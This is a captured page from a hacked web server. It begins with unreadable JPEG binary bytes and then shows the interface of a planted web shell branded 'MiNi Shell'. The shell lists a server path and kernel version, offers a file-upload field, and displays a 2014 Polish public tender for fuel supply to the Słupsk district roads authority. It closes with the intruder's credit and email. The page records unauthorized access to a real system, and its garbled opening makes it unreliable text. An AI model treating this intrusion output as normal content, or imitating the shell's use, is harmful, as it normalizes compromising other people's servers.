JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140512/101017-N-2014.html

<p class="kh_header"><b>Słupsk: Dostawa paliw płynnych dla potrzeb ZDP Słupsk</b><br>
<b>Numer ogłoszenia: 101017 - 2014; data zamieszczenia: 12.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Słoneczna 16e, 76-200 Słupsk, woj. pomorskie, tel. 059 8420730, 0598420269, faks 0598420284.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw płynnych dla potrzeb ZDP Słupsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa paliw płynnych do pojazdów,  maszyn i sprzętu 
      drogowego będących własnością Zamawiającego, sukcesywnie w ilościach detalicznych , w 
      obrocie bezgotówkowym.

Zamawiający prowadzi swoją działalność w oparciu o dwie placówki terenowe  obwody
      drogowe, które mają swoje siedziby jak niżej
	     
      Obwód Drogowy Nr 1  76 200 Słupsk ul. Słoneczna 16e    (przy siedzibie Zamawiającego)
      Obwód Drogowy Nr 2-  76 220 Główczyce ul. Słupska 19A  pow. słupski

Z uwagi  na  siedziby placówek i miejsce garażowania pojazdów i sprzętu  zamówienie podzielono na dwa zadania 

       ZADANIE NR 1   dostawa paliw dla pojazdów i sprzętu Obwodu Drogowego Nr 1 w Słupsku
       ZADANIE NR 2   dostawa paliw dla pojazdów i sprzętu Obwodu Drogowego Nr 2 
                                        w Główczycach,
Wykonawca może złożyć ofertę na jedno lub dwa zadania, a Zamawiający dokona oceny ofert i 
wybierze ofertę  najkorzystniejszą na każde zadanie osobno.
  
Zakres rzeczowy zamówienia 
       Dostawa planowanej ilości paliwa, w okresie 12 miesięcy, od dnia podpisania umowy, dla 
       potrzeb Zamawiającego  wynosi:
	Olej napędowy	ON	  max.  50.000  litrów 
	Benzyna 		Pb	  max     4.400  litrów
	Autogaz 		LPG	  max        900  litrów

       Planowana dostawa  paliw  na poszczególne zadania, w okresie 12 miesięcy, od daty zawarcia 
       umowy, wynosi odpowiednio; 
	
				ZADANIE NR 1	   

	Olej napędowy	ON	max   25.000 litrów	   	
	Benzyna 		Pb	max.    2.200 litrów	   
	Autogaz 		LPG	max.       450 litrów	   
ZADANIE NR 2
        Olej napędowy	ON	max   25.000 litrów	   
	Benzyna 		Pb	max.    2.200 litrów	  
	Autogaz 		LPG	max.       450 litrów

Opis  wykonania
a  dostarczane paliwo musi spełniać wymagania określone rozporządzeniem Ministra Gospodarki z dnia
    09 grudnia 2008 r w sprawie wymagań jakościowych dla paliw ciekłych ( Dz U z 2008 r Nr 221 poz 1441)

b  Zamawiający zastrzega sobie możliwość ograniczenia przedmiotu zamówienia w zakresie ilościowym,  
    zgodnie z aktualnym zapotrzebowaniem 

c  dostawa realizowana będzie w formie sprzedaży paliw płynnych na  wyznaczonych  stacjach paliw, 
    którymi dysponuje Wykonawca, w wyniku tankowania bezpośredniego do zbiorników pojazdów i sprzętu

d  paliwa przez Zamawiającego będą pobierane sukcesywnie, stosownie do potrzeb,  Zamawiający będzie 
    płacił tylko za faktycznie pobrane paliwo, z zachowaniem stałego upustu do ceny paliwa obowiązującej 
    w dniu tankowania .

e  Zamawiający w załączniku Nr 9, do  wzoru umowy, sporządzi wykaz pojazdów i sprzętu, do których 
    będą  tankowane paliwa 

f   dopuszcza się zmianę ilości, marek i typów sprzętu i pojazdów objętych dostawą paliw
       
g  pobierane paliwo będzie każdorazowo odnotowywane przez Wykonawcę w dokumencie pracy pojazdu 
    lub sprzętu (karta drogowa lub raport pracy sprzętu) oraz w dokumencie  zbiorczym pobranych paliw w 
    miesiącu kalendarzowym (asygnata pobranych paliw za  miesiąc  )

h  Zamawiający wymaga potwierdzenia wydanego paliwa co do ilości i rodzaju, poprzez  złożenie podpisu 
    pracownika stacji benzynowej, w karcie drogowej pojazdu lub raporcie  pracy sprzętu oraz podpisu 
    pracownika Zamawiającego ( kierowcy pojazdu lub operatora  sprzętu) na dokumencie zbiorczym  
    (asygnacie pobranych paliw )
i  dokument  Asygnata pobranych paliw za miesiąc    stanowił będzie załącznik do faktury
j  płatność za pobrane paliwa dokonywana będzie raz w miesiącu z dołu, po złożeniu  prawidłowo 
   sporządzonej faktury, w terminie do 30 dni od daty jej  otrzymania. Zamawiający dopuszcza fakturowanie  
   dwa razy w miesiącu. Wykonawca  będzie wyliczał wartość sprzedanego paliwa  stosując zasadę
   cena w dniu tankowania   stały upust - cena po upuście  x  ilość sprzedanego paliwa  = wartość 
k   Zamawiający dopuszcza inną formę dokumentowania pobranych paliw

l  przy formie dokumentowania poprzez karty flotowe Wykonawca musi zapewnić, kartę flotową na każdy   
    numer rejestracyjny pojazdu i  na każda jednostkę sprzętową. Karty powinny rejestrować datę i miejsce   
    transakcji, ilość i wartość zakupu, liczbę dziennych transakcji, numer rejestracyjny  pojazdu lub określenie 
    jednostki sprzętowej. Karty musza być zabezpieczone kodem PIN.

ł  karty flotowe muszą umożliwiać dokonywanie płatności za oleje, smary i środki pielęgnacyjne.
  
m  Wykonawca po podpisaniu umowy dostarczy karty flotowe  i określi zasady zgłaszania , utraty lub 
    zniszczenia kart do bezgotówkowego regulowania należności.

n  koszt przygotowania i wydania kart pokrywa Wykonawca

Wspólny słownik zamówień 

	CPV  09100000 0	paliwa
	CPV  09132100 4	Benzyna
	CPV  09134000 7	Oleje Napędowe
	CPV  09120000 6	LPG


Zamawiający dopuszcza złożenie ofert częściowych   liczba części  2.
Zamawiający nie dopuszcza możliwości złożenia ofert wariantowych.
Zamawiający przewiduje udzielenie zamówienia uzupełniającego  do 20% wartości zamówienia 
      podstawowego, w trybie zamówień z wolnej ręki, na zasadach określonych w art.67 ust.1 pkt.7
      ustawy PZP.
Treść oferty musi odpowiadać Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić  zamówień uzupełniających w ilości  do 20% wartości zamówienia  
          podstawowego  w  trybie zamówień z wolnej ręki, na zasadach określonych w  art. 67 ust. 1 pkt 7
          ustawy PZP
  
Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do 
          zastosowania w zamówieniach uzupełniających stawek nie wyższych niż zastosowanych w 
          zamówieniu podstawowym.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.10.00.00-0, 09.13.21.00-4, 09.13.40.00-7, 09.12.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie o spełnianiu warunku przez Wykonawcę, art.22 ust. 1 Pzp. Przy dokonaniu oceny spełniania warunku Zamawiający będzie się kierował reguła spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie o spełnianiu warunku przez Wykonawcę, art.22 ust. 1 Pzp. Przy dokonaniu oceny spełniania warunku Zamawiający będzie się kierował reguła spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie o spełnianiu warunku przez Wykonawcę, art.22 ust. 1 Pzp. Przy dokonaniu oceny spełniania warunku Zamawiający będzie się kierował reguła spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć oświadczenie o spełnianiu warunku przez Wykonawcę, art.22 ust. 1 Pzp. Przy dokonaniu oceny spełniania warunku Zamawiający będzie się kierował reguła spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia : 
                      nie zalega z opłacaniem podatków  
                      nie zalega ze składkami ZUS</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Kserokopia koncesji lub zezwolenia na obrót paliwami (jeżeli jest wymagana)
Kserokopia polisy ubezpieczeniowej dot. ubezpieczenia w zakresie prowadzonej działalności</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdp.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Słupsku, ul. Słoneczna 16e, 76-200 Słupsk, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2014 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Słupsku, ul. Słoneczna 16e, 76-200 Słupsk, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com